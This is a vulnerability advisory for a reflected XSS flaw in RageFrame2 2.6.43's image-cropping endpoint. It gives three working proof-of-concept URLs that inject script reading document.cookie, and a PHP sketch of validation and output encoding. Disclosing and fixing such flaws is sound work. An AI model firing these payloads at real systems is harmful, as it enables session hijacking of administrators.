Description
Summary
RageFrame2 2.6.43 has a reflected cross-site scripting (XSS) vulnerability. An attacker can execute malicious script in the administrator's browser by inducing the administrator to click a link that carries the script in its query string.
Details
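In the image cropping function of RageFrame2 2.6.43 (the backend/cropper/crop endpoint), the three request parameters aspectRatio, boxId and multiple are not filtered before being written back into the response, so each of them is a separate reflected XSS injection point.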
POC
aspectRatio XSS payload
http://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0

boxId XSS payload
http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0

multiple XSS payload
http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
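
A defensive sketch for these three parameters, added here as an example and not taken from RageFrame2's code or its fix. It assumes, from the </script> prefix in the payloads, that the values are written into an inline script block; the expected types (number, identifier, 0/1) are assumptions drawn from the benign values in the PoC URLs, and the function names are hypothetical.

```php
<?php
// Added example, not RageFrame2 code. Assumption: the crop view writes the
// three query parameters into an inline <script> block.

/** Allow-list validation; types are assumed from the benign PoC values (1, 1, 0). */
function validateCropParams(array $q): array
{
    $ratio = filter_var($q['aspectRatio'] ?? null, FILTER_VALIDATE_FLOAT);
    if ($ratio === false || $ratio <= 0) {
        throw new InvalidArgumentException('aspectRatio must be a positive number');
    }
    $boxId = $q['boxId'] ?? '';
    if (!is_string($boxId) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $boxId)) {
        throw new InvalidArgumentException('boxId must be a short identifier');
    }
    $multiple = $q['multiple'] ?? '';
    if ($multiple !== '0' && $multiple !== '1') {
        throw new InvalidArgumentException('multiple must be 0 or 1');
    }
    return ['aspectRatio' => $ratio, 'boxId' => $boxId, 'multiple' => $multiple === '1'];
}

/** Encode for an inline <script> context: <, >, &, ' and " become \uXXXX escapes. */
function jsLiteral($value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

// Constructed request: the aspectRatio value from the PoC above, URL-decoded.
$hostile = [
    'aspectRatio' => '</script><script>alert(document.cookie)</script>',
    'boxId'       => '1',
    'multiple'    => '0',
];

// Layer 1: output encoding keeps the value inside a string literal, so the
// HTML parser never sees a closing </script> tag.
echo 'var aspectRatio = ' . jsLiteral($hostile['aspectRatio']) . ";\n";

// Layer 2: validation rejects the request before anything is rendered.
try {
    validateCropParams($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n"; // a controller would answer 400 here
}

// A well-formed request passes and is emitted as one encoded config object.
$ok = validateCropParams(['aspectRatio' => '1', 'boxId' => '1', 'multiple' => '0']);
echo 'var cropConfig = ' . jsLiteral($ok) . ";\n";
```

In a Yii2 view the same encoding is available as yii\helpers\Json::htmlEncode(); validation belongs in the controller action so that a malformed request never reaches the view.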
